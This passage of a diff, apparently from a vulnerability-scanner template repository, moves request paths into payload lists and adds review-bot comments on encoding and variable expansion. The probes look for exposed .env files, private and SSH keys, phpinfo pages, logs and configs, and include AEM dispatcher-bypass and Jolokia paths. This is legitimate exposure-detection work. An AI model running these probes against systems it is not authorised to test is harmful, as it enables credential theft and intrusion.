- "{{BaseURL}}/.github/workflows/docker.yml" - "/.github/workflows/release.yaml"
- "{{BaseURL}}/.github/workflows/ci-generated.yml" - "/.github/workflows/pr.yml"
- "{{BaseURL}}/.github/workflows/ci-push.yml" - "/.github/workflows/automerge.yml"
- "{{BaseURL}}/.github/workflows/ci-daily.yml" - "/.github/workflows/docker.yml"
- "{{BaseURL}}/.github/workflows/ci-issues.yml" - "/.github/workflows/ci-generated.yml"
- "{{BaseURL}}/.github/workflows/smoosh-status.yml" - "/.github/workflows/ci-push.yml"
- "{{BaseURL}}/.github/workflows/snyk.yml" - "/.github/workflows/ci-daily.yml"
- "/.github/workflows/ci-issues.yml"
- "/.github/workflows/smoosh-status.yml"
- "/.github/workflows/snyk.yml"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -20,28 +20,31 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.env" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.env.bak" payloads:
- "{{BaseURL}}/.env.dev" paths:
- "{{BaseURL}}/.env.dev.local" - "/.env"
- "{{BaseURL}}/.env.development.local" - "/.env.bak"
- "{{BaseURL}}/.env.prod" - "/.env.dev"
- "{{BaseURL}}/.env.prod.local" - "/.env.dev.local"
- "{{BaseURL}}/.env.production" - "/.env.development.local"
- "{{BaseURL}}/.env.production.local" - "/.env.prod"
- "{{BaseURL}}/.env.local" - "/.env.prod.local"
- "{{BaseURL}}/.env.example" - "/.env.production"
- "{{BaseURL}}/.env.stage" - "/.env.production.local"
- "{{BaseURL}}/.env.live" - "/.env.local"
- "{{BaseURL}}/.env.backup" - "/.env.example"
- "{{BaseURL}}/.env.save" - "/.env.stage"
- "{{BaseURL}}/.env.old" - "/.env.live"
- "{{BaseURL}}/.env.www" - "/.env.backup"
- "{{BaseURL}}/.env_1" - "/.env.save"
- "{{BaseURL}}/.env_sample" - "/.env.old"
- "{{BaseURL}}/.env.{{DN}}" - "/.env.www"
- "{{BaseURL}}/.env.{{SD}}" - "/.env_1"
- "{{BaseURL}}/api/.env" - "/.env_sample"
- "/.env.{{DN}}"
- "/.env.{{SD}}"
- "/api/.env"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -16,31 +16,34 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/php.php" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/php2.php" payloads:
- "{{BaseURL}}/phpinfo.php" paths:
- "{{BaseURL}}/info.php" - "/php.php"
- "{{BaseURL}}/infophp.php" - "/php2.php"
- "{{BaseURL}}/php_info.php" - "/phpinfo.php"
- "{{BaseURL}}/test.php" - "/info.php"
- "{{BaseURL}}/i.php" - "/infophp.php"
- "{{BaseURL}}/p.php" - "/php_info.php"
- "{{BaseURL}}/pi.php" - "/test.php"
- "{{BaseURL}}/asdf.php" - "/i.php"
- "{{BaseURL}}/pinfo.php" - "/p.php"
- "{{BaseURL}}/phpversion.php" - "/pi.php"
- "{{BaseURL}}/time.php" - "/asdf.php"
- "{{BaseURL}}/index.php" - "/pinfo.php"
- "{{BaseURL}}/temp.php" - "/phpversion.php"
- "{{BaseURL}}/old_phpinfo.php" - "/time.php"
- "{{BaseURL}}/infos.php" - "/index.php"
- "{{BaseURL}}/linusadmin-phpinfo.php" - "/temp.php"
- "{{BaseURL}}/php-info.php" - "/old_phpinfo.php"
- "{{BaseURL}}/dashboard/phpinfo.php" - "/infos.php"
- "{{BaseURL}}/_profiler/phpinfo.php" - "/linusadmin-phpinfo.php"
- "{{BaseURL}}/_profiler/phpinfo" - "/php-info.php"
- "{{BaseURL}}/?phpinfo=1" - "/dashboard/phpinfo.php"
- "{{BaseURL}}/l.php?act=phpinfo" - "/_profiler/phpinfo.php"
- "/_profiler/phpinfo"
- "/?phpinfo=1"
- "/l.php?act=phpinfo"
stop-at-first-match: true stop-at-first-match: true


@ -16,51 +16,54 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/localhost.key" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/host.key" payloads:
- "{{BaseURL}}/www.key" paths:
- "{{BaseURL}}/private-key" - "/localhost.key"
- "{{BaseURL}}/privatekey.key" - "/host.key"
- "{{BaseURL}}/server.key" - "/www.key"
- "{{BaseURL}}/my.key" - "/private-key"
- "{{BaseURL}}/key.pem" - "/privatekey.key"
- "{{BaseURL}}/ssl/localhost.key" - "/server.key"
- "{{BaseURL}}/ssl/{{Hostname}}.key" - "/my.key"
- "{{BaseURL}}/id_rsa" - "/key.pem"
- "{{BaseURL}}/id_dsa" - "/ssl/localhost.key"
- "{{BaseURL}}/id_rsa_1024" - "/ssl/{{Hostname}}.key"
- "{{BaseURL}}/id_rsa_2048" - "/id_rsa"
- "{{BaseURL}}/id_rsa_3072" - "/id_dsa"
- "{{BaseURL}}/id_rsa_4096" - "/id_rsa_1024"
- "{{BaseURL}}/.ssh/id_rsa" - "/id_rsa_2048"
- "{{BaseURL}}/.ssh/id_dsa" - "/id_rsa_3072"
- "{{BaseURL}}/.ssh/id_rsa_1024" - "/id_rsa_4096"
- "{{BaseURL}}/.ssh/id_rsa_2048" - "/.ssh/id_rsa"
- "{{BaseURL}}/.ssh/id_rsa_3072" - "/.ssh/id_dsa"
- "{{BaseURL}}/.ssh/id_rsa_4096" - "/.ssh/id_rsa_1024"
- "{{BaseURL}}/{{Hostname}}.key" - "/.ssh/id_rsa_2048"
- "{{BaseURL}}/{{Hostname}}.pem" - "/.ssh/id_rsa_3072"
- "{{BaseURL}}/config/jwt/private.pem" - "/.ssh/id_rsa_4096"
- "{{BaseURL}}/jwt/private.pem" - "/{{Hostname}}.key"
- "{{BaseURL}}/var/jwt/private.pem" - "/{{Hostname}}.pem"
- "{{BaseURL}}/private.pem" - "/config/jwt/private.pem"
- "{{BaseURL}}/ssl.txt" - "/jwt/private.pem"
- "{{BaseURL}}/ssl_key.txt" - "/var/jwt/private.pem"
- "{{BaseURL}}/certificates/{{Host}}.pfx" - "/private.pem"
- "{{BaseURL}}/certificates/{{Host}}.p12" - "/ssl.txt"
- "{{BaseURL}}/ssl/{{Host}}.pem" - "/ssl_key.txt"
- "{{BaseURL}}/ssl/{{Host}}_key.txt" - "/certificates/{{Host}}.pfx"
- "{{BaseURL}}/cert/{{Host}}_key.txt" - "/certificates/{{Host}}.p12"
- "{{BaseURL}}/cert/{{RDN}}_key.txt" - "/ssl/{{Host}}.pem"
- "{{BaseURL}}/cert/{{Host}}.txt" - "/ssl/{{Host}}_key.txt"
- "{{BaseURL}}/ssl/private/{{Host}}_key.pem" - "/cert/{{Host}}_key.txt"
- "{{BaseURL}}/certs/{{Host}}_private.key" - "/cert/{{RDN}}_key.txt"
- "{{BaseURL}}/certs/{{Host}}.key" - "/cert/{{Host}}.txt"
- "{{BaseURL}}/certificates/{{Host}}_priv.pem" - "/ssl/private/{{Host}}_key.pem"
- "{{BaseURL}}/certificates/{{Host}}_privkey.pem" - "/certs/{{Host}}_private.key"
- "{{BaseURL}}/certs/{{Host}}.pem" - "/certs/{{Host}}.key"
- "{{BaseURL}}/private/{{Host}}.key" - "/certificates/{{Host}}_priv.pem"
- "{{BaseURL}}/keys/{{Host}}.pem" - "/certificates/{{Host}}_privkey.pem"
- "/certs/{{Host}}.pem"
- "/private/{{Host}}.key"
- "/keys/{{Host}}.pem"
stop-at-first-match: true stop-at-first-match: true


@ -12,19 +12,22 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/application/configs/application.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/admin/configs/application.ini" payloads:
- "{{BaseURL}}/application.ini" paths:
- "{{BaseURL}}/aplicacao/application/configs/application.ini" - "/application/configs/application.ini"
- "{{BaseURL}}/cloudexp/application/configs/application.ini" - "/admin/configs/application.ini"
- "{{BaseURL}}/cms/application/configs/application.ini" - "/application.ini"
- "{{BaseURL}}/moto/application/configs/application.ini" - "/aplicacao/application/configs/application.ini"
- "{{BaseURL}}/Partners/application/configs/application.ini" - "/cloudexp/application/configs/application.ini"
- "{{BaseURL}}/radio/application/configs/application.ini" - "/cms/application/configs/application.ini"
- "{{BaseURL}}/seminovos/application/configs/application.ini" - "/moto/application/configs/application.ini"
- "{{BaseURL}}/shop/application/configs/application.ini" - "/Partners/application/configs/application.ini"
- "{{BaseURL}}/site_cg/application/configs/application.ini" - "/radio/application/configs/application.ini"
- "{{BaseURL}}/slr/application/configs/application.ini" - "/seminovos/application/configs/application.ini"
- "/shop/application/configs/application.ini"
- "/site_cg/application/configs/application.ini"
- "/slr/application/configs/application.ini"
stop-at-first-match: true stop-at-first-match: true


@ -14,21 +14,24 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/routes.ini" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/config/routes.ini" payloads:
- "{{BaseURL}}/admin/configs/routes.ini" paths:
- "{{BaseURL}}/application/configs/routes.ini" - "/routes.ini"
- "{{BaseURL}}/aplicacao/routes/configs/routes.ini" - "/config/routes.ini"
- "{{BaseURL}}/routes/configs/routes.ini" - "/admin/configs/routes.ini"
- "{{BaseURL}}/cloudexp/routes/configs/routes.ini" - "/application/configs/routes.ini"
- "{{BaseURL}}/cms/routes/configs/routes.ini" - "/aplicacao/routes/configs/routes.ini"
- "{{BaseURL}}/moto/routes/configs/routes.ini" - "/routes/configs/routes.ini"
- "{{BaseURL}}/Partners/routes/configs/routes.ini" - "/cloudexp/routes/configs/routes.ini"
- "{{BaseURL}}/radio/routes/configs/routes.ini" - "/cms/routes/configs/routes.ini"
- "{{BaseURL}}/seminovos/routes/configs/routes.ini" - "/moto/routes/configs/routes.ini"
- "{{BaseURL}}/shop/routes/configs/routes.ini" - "/Partners/routes/configs/routes.ini"
- "{{BaseURL}}/site_cg/routes/configs/routes.ini" - "/radio/routes/configs/routes.ini"
- "{{BaseURL}}/slr/routes/configs/routes.ini" - "/seminovos/routes/configs/routes.ini"
- "/shop/routes/configs/routes.ini"
- "/site_cg/routes/configs/routes.ini"
- "/slr/routes/configs/routes.ini"
stop-at-first-match: true stop-at-first-match: true


@ -12,33 +12,36 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/.build.sh" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/.jenkins.sh" payloads:
- "{{BaseURL}}/.travis.sh" paths:
- "{{BaseURL}}/install.sh" - "/.build.sh"
- "{{BaseURL}}/update.sh" - "/.jenkins.sh"
- "{{BaseURL}}/upload.sh" - "/.travis.sh"
- "{{BaseURL}}/config.sh" - "/install.sh"
- "{{BaseURL}}/build.sh" - "/update.sh"
- "{{BaseURL}}/setup.sh" - "/upload.sh"
- "{{BaseURL}}/run.sh" - "/config.sh"
- "{{BaseURL}}/backup.sh" - "/build.sh"
- "{{BaseURL}}/compile.sh" - "/setup.sh"
- "{{BaseURL}}/env.sh" - "/run.sh"
- "{{BaseURL}}/init.sh" - "/backup.sh"
- "{{BaseURL}}/startup.sh" - "/compile.sh"
- "{{BaseURL}}/wp-setup.sh" - "/env.sh"
- "{{BaseURL}}/deploy.sh" - "/init.sh"
- "{{BaseURL}}/aws.sh" - "/startup.sh"
- "{{BaseURL}}/reminder.sh" - "/wp-setup.sh"
- "{{BaseURL}}/mysqlbackup.sh" - "/deploy.sh"
- "{{BaseURL}}/dev2local.sh" - "/aws.sh"
- "{{BaseURL}}/local2dev.sh" - "/reminder.sh"
- "{{BaseURL}}/local2prod.sh" - "/mysqlbackup.sh"
- "{{BaseURL}}/prod2local.sh" - "/dev2local.sh"
- "{{BaseURL}}/rsync.sh" - "/local2dev.sh"
- "{{BaseURL}}/sync.sh" - "/local2prod.sh"
- "{{BaseURL}}/test.sh" - "/prod2local.sh"
- "/rsync.sh"
- "/sync.sh"
- "/test.sh"
matchers-condition: and matchers-condition: and
matchers: matchers:


@ -12,35 +12,38 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/php_errors.log" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/MyErrors.log" payloads:
- "{{BaseURL}}/admin/error.log" paths:
- "{{BaseURL}}/admin/errors.log" - "/php_errors.log"
- "{{BaseURL}}/admin/log/error.log" - "/MyErrors.log"
- "{{BaseURL}}/admin/logs/error.log" - "/admin/error.log"
- "{{BaseURL}}/admin/logs/errors.log" - "/admin/errors.log"
- "{{BaseURL}}/application/logs/application.log" - "/admin/log/error.log"
- "{{BaseURL}}/application/logs/default.log" - "/admin/logs/error.log"
- "{{BaseURL}}/config/error_log" - "/admin/logs/errors.log"
- "{{BaseURL}}/error.log" - "/application/logs/application.log"
- "{{BaseURL}}/error.txt" - "/application/logs/default.log"
- "{{BaseURL}}/error/error.log" - "/config/error_log"
- "{{BaseURL}}/error_log" - "/error.log"
- "{{BaseURL}}/error_log.txt" - "/error.txt"
- "{{BaseURL}}/errors.log" - "/error/error.log"
- "{{BaseURL}}/errors.txt" - "/error_log"
- "{{BaseURL}}/errors/errors.log" - "/error_log.txt"
- "{{BaseURL}}/errors_log" - "/errors.log"
- "{{BaseURL}}/log.log" - "/errors.txt"
- "{{BaseURL}}/log.txt" - "/errors/errors.log"
- "{{BaseURL}}/log/error.log" - "/errors_log"
- "{{BaseURL}}/log/errors.log" - "/log.log"
- "{{BaseURL}}/logs.txt" - "/log.txt"
- "{{BaseURL}}/logs/error.log" - "/log/error.log"
- "{{BaseURL}}/logs/errors.log" - "/log/errors.log"
- "{{BaseURL}}/routes/error_log" - "/logs.txt"
- "{{BaseURL}}/{{Hostname}}/error.log" - "/logs/error.log"
- "{{BaseURL}}/{{Hostname}}/errors.log" - "/logs/errors.log"
- "/routes/error_log"
- "/{{Hostname}}/error.log"
- "/{{Hostname}}/errors.log"
stop-at-first-match: true stop-at-first-match: true
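Review bot: The last two payload entries, `"/{{Hostname}}/error.log"` and `"/{{Hostname}}/errors.log"`, now carry a template variable inside a payload value instead of directly in `path`, and nothing visible here shows that variables nested in payload values are still expanded. If they are not, those two probes would request a literal `{{Hostname}}` segment and the exposed-log check would silently lose coverage for host-named directories. The same applies to `"/.env.{{DN}}"` and `"/.env.{{SD}}"` in the .env template further down and to the `{{Host}}` key-file entries at the top of this view. I would confirm with one debug run against a test host and record the result in a comment above `payloads:`, for example `# payload values may contain {{Hostname}}; verified to expand before the request is built`.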


@ -16,70 +16,73 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/etc' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/var' payloads:
- '{{BaseURL}}/apps' paths:
- '{{BaseURL}}/home' - "/etc"
- '{{BaseURL}}///etc' - "/var"
- '{{BaseURL}}///var' - "/apps"
- '{{BaseURL}}///apps' - "/home"
- '{{BaseURL}}///home' - "///etc"
- '{{BaseURL}}/.json' - "///var"
- '{{BaseURL}}/.1.json' - "///apps"
- '{{BaseURL}}/....4.2.1....json' - "///home"
- '{{BaseURL}}/.json?FNZ.css' - "/.json"
- '{{BaseURL}}/.json?FNZ.ico' - "/.1.json"
- '{{BaseURL}}/.json?FNZ.html' - "/....4.2.1....json"
- '{{BaseURL}}/.json/FNZ.css' - "/.json?FNZ.css"
- '{{BaseURL}}/.json/FNZ.html' - "/.json?FNZ.ico"
- '{{BaseURL}}/.json/FNZ.png' - "/.json?FNZ.html"
- '{{BaseURL}}/.json/FNZ.ico' - "/.json/FNZ.css"
- '{{BaseURL}}/.children.1.json' - "/.json/FNZ.html"
- '{{BaseURL}}/.children....4.2.1....json' - "/.json/FNZ.png"
- '{{BaseURL}}/.children.json?FNZ.css' - "/.json/FNZ.ico"
- '{{BaseURL}}/.children.json?FNZ.ico' - "/.children.1.json"
- '{{BaseURL}}/.children.json?FNZ.html' - "/.children....4.2.1....json"
- '{{BaseURL}}/.children.json/FNZ.css' - "/.children.json?FNZ.css"
- '{{BaseURL}}/.children.json/FNZ.html' - "/.children.json?FNZ.ico"
- '{{BaseURL}}/.children.json/FNZ.png' - "/.children.json?FNZ.html"
- '{{BaseURL}}/.children.json/FNZ.ico' - "/.children.json/FNZ.css"
- '{{BaseURL}}/etc.json' - "/.children.json/FNZ.html"
- '{{BaseURL}}/etc.1.json' - "/.children.json/FNZ.png"
- '{{BaseURL}}/etc....4.2.1....json' - "/.children.json/FNZ.ico"
- '{{BaseURL}}/etc.json?FNZ.css' - "/etc.json"
- '{{BaseURL}}/etc.json?FNZ.ico' - "/etc.1.json"
- '{{BaseURL}}/etc.json?FNZ.html' - "/etc....4.2.1....json"
- '{{BaseURL}}/etc.json/FNZ.css' - "/etc.json?FNZ.css"
- '{{BaseURL}}/etc.json/FNZ.html' - "/etc.json?FNZ.ico"
- '{{BaseURL}}/etc.json/FNZ.ico' - "/etc.json?FNZ.html"
- '{{BaseURL}}/etc.children.json' - "/etc.json/FNZ.css"
- '{{BaseURL}}/etc.children.1.json' - "/etc.json/FNZ.html"
- '{{BaseURL}}/etc.children....4.2.1....json' - "/etc.json/FNZ.ico"
- '{{BaseURL}}/etc.children.json?FNZ.css' - "/etc.children.json"
- '{{BaseURL}}/etc.children.json?FNZ.ico' - "/etc.children.1.json"
- '{{BaseURL}}/etc.children.json?FNZ.html' - "/etc.children....4.2.1....json"
- '{{BaseURL}}/etc.children.json/FNZ.css' - "/etc.children.json?FNZ.css"
- '{{BaseURL}}/etc.children.json/FNZ.html' - "/etc.children.json?FNZ.ico"
- '{{BaseURL}}/etc.children.json/FNZ.png' - "/etc.children.json?FNZ.html"
- '{{BaseURL}}/etc.children.json/FNZ.ico' - "/etc.children.json/FNZ.css"
- '{{BaseURL}}///etc.json' - "/etc.children.json/FNZ.html"
- '{{BaseURL}}///etc.1.json' - "/etc.children.json/FNZ.png"
- '{{BaseURL}}///etc....4.2.1....json' - "/etc.children.json/FNZ.ico"
- '{{BaseURL}}///etc.json?FNZ.css' - "///etc.json"
- '{{BaseURL}}///etc.json?FNZ.ico' - "///etc.1.json"
- '{{BaseURL}}///etc.json/FNZ.html' - "///etc....4.2.1....json"
- '{{BaseURL}}///etc.json/FNZ.png' - "///etc.json?FNZ.css"
- '{{BaseURL}}///etc.json/FNZ.ico' - "///etc.json?FNZ.ico"
- '{{BaseURL}}///etc.children.json' - "///etc.json/FNZ.html"
- '{{BaseURL}}///etc.children.1.json' - "///etc.json/FNZ.png"
- '{{BaseURL}}///etc.children....4.2.1....json' - "///etc.json/FNZ.ico"
- '{{BaseURL}}///etc.children.json?FNZ.css' - "///etc.children.json"
- '{{BaseURL}}///etc.children.json?FNZ.ico' - "///etc.children.1.json"
- '{{BaseURL}}///etc.children.json?FNZ.html' - "///etc.children....4.2.1....json"
- '{{BaseURL}}///etc.children.json/FNZ.css' - "///etc.children.json?FNZ.css"
- '{{BaseURL}}///etc.children.json/FNZ.html' - "///etc.children.json?FNZ.ico"
- '{{BaseURL}}///etc.children.json/FNZ.png' - "///etc.children.json?FNZ.html"
- '{{BaseURL}}///etc.children.json/FNZ.ico' - "///etc.children.json/FNZ.css"
- "///etc.children.json/FNZ.html"
- "///etc.children.json/FNZ.png"
- "///etc.children.json/FNZ.ico"
stop-at-first-match: true stop-at-first-match: true


@ -15,35 +15,38 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - "{{BaseURL}}{{paths}}"
- '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' payloads:
- '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' paths:
- '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico"
- '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - "/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix="
- '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - "///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix="
- "///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix="
stop-at-first-match: true stop-at-first-match: true
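Review bot: Every entry under `paths:` is already percent-encoded (`%20`, `;%0a`) and relies on repeated slashes being kept, so moving from a literal `path` to `{{BaseURL}}{{paths}}` is only equivalent if substituted payload values reach the wire byte-for-byte. This hunk does not show that; any re-encoding or slash normalisation of payload values would turn `%0a` into `%250a` or collapse `///bin`, and the template would stop detecting the exposure without reporting an error. The WEB-INF template later in this commit (its `%c0%ae` entries) depends on the same assumption. A before/after comparison of the emitted requests for one entry from each list would settle it, and a short comment such as `# entries are pre-encoded and must be sent unchanged` above `paths:` would keep later edits from normalising them.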


@ -18,15 +18,18 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/miscadmin" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/mcmadmin#/content/dashboard" payloads:
- "{{BaseURL}}/miscadmin#/etc/mobile" paths:
- "{{BaseURL}}/miscadmin#/etc/segmentation" - "/miscadmin"
- "{{BaseURL}}/miscadmin#/etc/blueprints" - "/mcmadmin#/content/dashboard"
- "{{BaseURL}}/miscadmin#/etc/designs" - "/miscadmin#/etc/mobile"
- "{{BaseURL}}/miscadmin#/etc/importers" - "/miscadmin#/etc/segmentation"
- "{{BaseURL}}/miscadmin#/etc/reports" - "/miscadmin#/etc/blueprints"
- "{{BaseURL}}/miscadmin#/etc/msm/rolloutconfigs" - "/miscadmin#/etc/designs"
- "/miscadmin#/etc/importers"
- "/miscadmin#/etc/reports"
- "/miscadmin#/etc/msm/rolloutconfigs"
stop-at-first-match: true stop-at-first-match: true
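Review bot: Eight of the nine payloads differ only after `#` (`"/miscadmin#/etc/mobile"`, `"/miscadmin#/etc/segmentation"`, and so on), and a URL fragment is normally not part of the request line, so these probably all resolve to the same `/miscadmin` request. If that holds here, the list can shrink to `- "/miscadmin"` and `- "/mcmadmin"`, which avoids sending repeated identical requests to hosts that do not match. Whether the engine strips or forwards the fragment is not visible in this hunk, so check the emitted requests before trimming.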


@ -15,22 +15,25 @@ info:
http: http:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName" - "{{BaseURL}}{{paths}}"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor" payloads:
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion" paths:
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
- "{{BaseURL}}/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
- "{{BaseURL}}/actuator/jolokia/read/java.lang:type=Memory" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
- "{{BaseURL}}/jolokia/read/java.lang:type=Memory" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName" - "/actuator/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor" - "/actuator/jolokia/read/java.lang:type=Memory"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion" - "/jolokia/read/java.lang:type=Memory"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationName"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVendor"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/ImplementationVersion"
- "{{BaseURL}}/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion" - "/jolokia/read/JMImplementation:type=MBeanServerDelegate/MBeanServerId"
- "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationName"
- "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVendor"
- "/jolokia/read/JMImplementation:type=MBeanServerDelegate/SpecificationVersion"
matchers-condition: or matchers-condition: or
matchers: matchers:


@ -16,16 +16,19 @@ info:
http: http:
